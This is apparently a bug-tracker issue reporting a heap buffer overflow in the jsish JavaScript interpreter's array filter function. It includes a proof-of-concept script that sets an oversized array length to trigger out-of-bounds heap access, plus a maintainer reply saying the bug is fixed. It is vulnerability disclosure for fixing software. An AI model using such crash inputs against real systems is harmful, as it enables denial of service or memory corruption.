buffer overflow

[bird8693]

Enviroment

operating system: ubuntu18.04
compile command: ./configure && make
test command: ./jsish poc1 

poc:

var o = [
    1,
    2
];
o.length = ~-2147483648;
o = o.reverse();
var a = Object.keys(o);
var pJZc = JSON.stringify('gA6MJqj19J?*JEEN');
pJZc = pJZc.slice(pJZc.length, pJZc.length);
pJZc = o.filter(function () {
}, 3037000498);
var GRPm = new RegExp('');
var NXPj = new RegExp('_IÁ\x80\xA7\t\x07ñ\xBB=MÙ%ÿ');
GRPm = o.indexOf(2147483647, function () {
});
JSON.stringify('Rmt(3oS<C?]+^J*uH0pR]');
o = a.slice(o, o);
var DYsj = new SharedArrayBuffer(2147483647);
var KweA = new Map([
    [
        0,
        1,
        o,
        673720360,
        o,
        a,
        o.length
    ],
    [
        a.length,
        42,
        a,
        -2147483648,
        a.length,
        -Infinity,
        o,
        1e-15
    ]
]);
var JXpp = JSON.stringify('\xA6\xB8løÚz\x1Cz\x81\x83ó\x9D;\xA9!ð\x8F\x87\xB3nZ');
var NRrA;
NRrA = o.toString(o);

vulnerability description:

The code that caused the vulnerability is on line src / jsiArray.c: 464, the function jsi_ArrayFilterCmd, the code is as follows:

curlen is obtained by reading the length of the object obj, as shown in the figure:

Modify the length of obj in PoC to a larger value, ie:

Then call the o.filter function to trigger jsish's jsi_ArrayFilterCmd function, and then make the curlen value larger, and access the heap space after the obj-> arr array is crossed.

[pcmacdon]

This issue was resolved by the fix to issue #5.